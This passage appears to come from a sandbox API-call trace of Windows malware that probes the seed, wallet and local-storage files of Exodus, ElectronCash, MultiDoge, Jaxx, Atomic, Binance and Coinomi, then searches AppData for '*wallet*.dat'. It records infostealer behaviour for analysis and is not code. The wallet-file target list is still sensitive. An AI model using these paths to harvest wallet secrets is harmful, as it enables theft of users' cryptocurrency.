"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0174.838] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\seed.seco") returned 69 [0174.838] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\seed.seco" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet\\seed.seco"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.838] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.839] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Exodus\\exodus.wallet\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" [0174.839] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet")) returned 0 [0174.839] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\info.seco") returned 69 [0174.839] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Exodus\\exodus.wallet\\\\info.seco" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\exodus\\exodus.wallet\\info.seco"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.839] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0174.839] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\ElectronCash\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\" [0174.839] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electroncash\\wallets")) returned 0 [0174.839] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\\\default_wallet") returned 74 [0174.839] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ElectronCash\\wallets\\\\default_wallet" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\electroncash\\wallets\\default_wallet"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0174.839] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.048] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\MultiDoge\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\" [0175.048] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\multidoge")) returned 0 [0175.048] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\\\multidoge.wallet") returned 65 [0175.048] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\MultiDoge\\\\multidoge.wallet" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\multidoge\\multidoge.wallet"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.048] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.048] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\jaxx\\Local Storage\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\" [0175.048] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jaxx\\local storage")) returned 0 [0175.048] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\\\file__0.localstorage") returned 78 [0175.048] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jaxx\\Local Storage\\\\file__0.localstorage" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jaxx\\local storage\\file__0.localstorage"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.049] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.049] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0175.049] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0175.049] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\000003.log") returned 78 [0175.049] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\000003.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb\\000003.log"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.049] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.049] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0175.049] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0175.049] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\CURRENT") returned 75 [0175.050] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\CURRENT" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb\\current"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.050] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.050] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0175.050] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0175.050] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOCK") returned 72 [0175.050] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOCK" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb\\lock"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.050] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.050] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0175.050] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0175.051] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOG") returned 71 [0175.051] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\LOG" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb\\log"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.051] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.051] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0175.051] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0175.051] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\MANIFEST-000001") returned 83 [0175.051] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\MANIFEST-000001" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb\\manifest-000001"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.051] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.051] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\atomic\\Local Storage\\leveldb\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" [0175.051] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0 [0175.051] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\0000*") returned 73 [0175.052] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\\\0000*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\atomic\\local storage\\leveldb\\0000*"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.052] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.052] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Binance\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\" [0175.052] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\binance")) returned 0 [0175.052] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\\\app-store.json") returned 61 [0175.052] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Binance\\\\app-store.json" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\binance\\app-store.json"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.052] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0175.052] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Coinomi\\Coinomi\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" [0175.052] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets")) returned 0 [0175.053] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.wallet") returned 69 [0175.053] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.wallet" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets\\*.wallet"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.053] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1985d0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0175.053] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Coinomi\\Coinomi\\wallets\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" [0175.053] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets")) returned 0 [0175.053] wsprintfA (in: param_1=0x1984a8, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.config") returned 69 [0175.053] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coinomi\\Coinomi\\wallets\\\\*.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coinomi\\coinomi\\wallets\\*.config"), lpFindFileData=0x198360 | out: lpFindFileData=0x198360*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x19837c, ftCreationTime.dwHighDateTime=0x74560115, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x198398, ftLastWriteTime.dwLowDateTime=0x1985d0, ftLastWriteTime.dwHighDateTime=0x104, nFileSizeHigh=0x1985a4, nFileSizeLow=0x746ddc10, dwReserved0=0x198398, dwReserved1=0x1985d0, cFileName="\x04\x01", cAlternateFileName="")) returned 0xffffffff [0175.053] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x1986f4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0175.054] wsprintfA (in: param_1=0x1985d4, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*") returned 39 [0175.054] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\*"), lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xec4cd910, ftLastAccessTime.dwHighDateTime=0x1d8a75e, ftLastWriteTime.dwLowDateTime=0xec4cd910, ftLastWriteTime.dwHighDateTime=0x1d8a75e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName=".", cAlternateFileName="")) returned 0x4eb390 [0175.054] StrCmpCA (pszStr1=".", pszStr2=".") returned 0 [0175.054] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xec4cd910, ftLastAccessTime.dwHighDateTime=0x1d8a75e, ftLastWriteTime.dwLowDateTime=0xec4cd910, ftLastWriteTime.dwHighDateTime=0x1d8a75e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="..", cAlternateFileName="")) returned 1 [0175.054] StrCmpCA (pszStr1="..", pszStr2=".") returned 46 [0175.054] StrCmpCA (pszStr1="..", pszStr2="..") returned 0 [0175.054] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: lpFindFileData=0x19848c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b90d1f0, ftCreationTime.dwHighDateTime=0x1d89d06, ftLastAccessTime.dwLowDateTime=0x1b8b7260, ftLastAccessTime.dwHighDateTime=0x1d8a6d8, ftLastWriteTime.dwLowDateTime=0x1b8b7260, ftLastWriteTime.dwHighDateTime=0x1d8a6d8, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x4e0043, dwReserved1=0x650046, cFileName="1w1hj.wav", cAlternateFileName="")) returned 1 [0175.054] StrCmpCA (pszStr1="1w1hj.wav", pszStr2=".") returned 3 [0175.054] StrCmpCA (pszStr1="1w1hj.wav", pszStr2="..") returned 3 [0175.054] wsprintfA (in: param_1=0x19827c, param_2="%s\\%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\1w1hj.wav") returned 47 [0175.055] StrCmpCA (pszStr1="", pszStr2="") returned 0 [0175.055] wsprintfA (in: param_1=0x198384, param_2="%s" | out: param_1="1w1hj.wav") returned 9 [0175.055] PathMatchSpecA (pszFile="1w1hj.wav", pszSpec="*wallet*.dat") returned 0 [0175.055] wsprintfA (in: param_1=0x197f4c, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\1w1hj.wav\\*") returned 49 [0175.055] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\1w1hj.wav\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\1w1hj.wav\\*"), lpFindFileData=0x197e04 | out: lpFindFileData=0x197e04*(dwFileAttributes=0x1b90d1f0, ftCreationTime.dwLowDateTime=0x1d89d06, ftCreationTime.dwHighDateTime=0x1b8b7260, ftLastAccessTime.dwLowDateTime=0x1d8a6d8, ftLastAccessTime.dwHighDateTime=0x1b8b7260, ftLastWriteTime.dwLowDateTime=0x1d8a6d8, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x5f8, nFileSizeLow=0x4e0043, dwReserved0=0x650046, dwReserved1=0x770031, cFileName="1", cAlternateFileName="")) returned 0xffffffff [0175.055] FindNextFileA (in: hFindFile=0x4eb390, lpFindFileData=0x19848c | out: 